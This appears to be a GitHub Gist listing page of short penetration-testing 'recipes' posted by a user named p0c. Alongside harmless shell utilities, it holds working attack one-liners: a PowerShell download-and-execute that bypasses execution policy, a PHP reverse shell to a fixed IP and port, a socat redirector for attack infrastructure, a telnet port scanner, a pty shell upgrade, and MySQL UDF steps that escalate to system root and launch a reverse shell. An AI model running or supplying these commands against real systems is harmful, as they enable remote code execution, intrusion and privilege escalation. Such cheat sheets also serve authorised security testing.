This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sleep_until() { | |
| current_time=$(date +%s) | |
| target_time=$(date -d "$*" +%s) | |
| seconds=$(( $target_time - $current_time )) | |
| sleep $seconds | |
| } | |
| # Usage: | |
| # sleep_until tomorrow 11:50 | |
| # sleep_until 24 hours |
p0c
/ download_exec_bypass_execp
Created
February 16, 2015 09:40
download and exec bypassing powershell execution policy
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://your_host/your_script.ps1')" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # socat tcp port redirector, useful for cloud based redirectors (distributed attack network simulation) | |
| socat TCP-LISTEN:80,fork TCP:10.10.0.1:80 |
p0c
/ script_strip
Created
June 26, 2014 11:16
#pentest #recipe: clean escape sequence codes from 'script' log
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| #----------------------------------------------------------------------------- | |
| # Preconditions: | |
| # | |
| # You have a `script` command outputfile (typescript by default) | |
| # | |
| # $ script | |
| # Script started, file is typescript | |
| # <-- your commands and output here --> |
p0c
/ php_small_reverseshell
Created
February 17, 2014 09:49
#pentest #recipe: small php reverse shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # fd for tcp could change (in this case == 3) | |
| <?php $s=fsockopen("10.0.0.1",1234);exec("sh<&3>&3 2>&3");?> | |
| # command line version | |
| php -r '$s=fsockopen("10.0.0.1",1234);exec("sh<&3>&3 2>&3");' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ssh -YC4c arcfour,blowfish-cbc user@host |
p0c
/ bash_portscanner
Created
February 4, 2014 19:52
#pentest #recipe: bash commandline portscanner
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| HOST=192.168.100.254;for((port=1;port<=65535;++port));do echo -en "$port ";if echo -en "open $HOST $port\nlogout\quit" | telnet 2>/dev/null | grep 'Connected to' > /dev/null;then echo -en "\n\nport $port/tcp is open\n\n";fi;done |
p0c
/ upgrade_to_proper_shell
Created
February 4, 2014 10:51
#pentest #recipe: upgrade to proper shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ python -c 'import pty;pty.spawn("/bin/bash")' |
p0c
/ mysql_root_to_system_root
Last active
August 14, 2021 23:58
#pentest #recipe: mysql root -> system root (linux)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # download lib_mysqludf_sys.so from https://github.com/sqlmapproject/sqlmap/tree/master/udf/mysql | |
| # (currently not present in kali's sqlmap, only the windows one, the same for metasploit...) | |
| mysql> use mysql; | |
| mysql> create table test(line blob); | |
| mysql> insert into test values(load_file('/tmp/lib_mysqludf_sys.so')); | |
| mysql> select * from test into dumpfile '/usr/lib/lib_mysqludf_sys.so'; | |
| mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so'; | |
| mysql> select sys_exec('./reverse_shell &'); |
p0c
/ vim-ignore-esc-seq
Created
January 8, 2014 16:03
Ignore escape sequences in VIM: Useful for editing / viewing script command output
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Use AnsiEsc.vim (https://github.com/vim-scripts/AnsiEsc.vim) | |
| When editing a file with escape sequences (for example output of script command) --> :AnsiEsc |
NewerOlder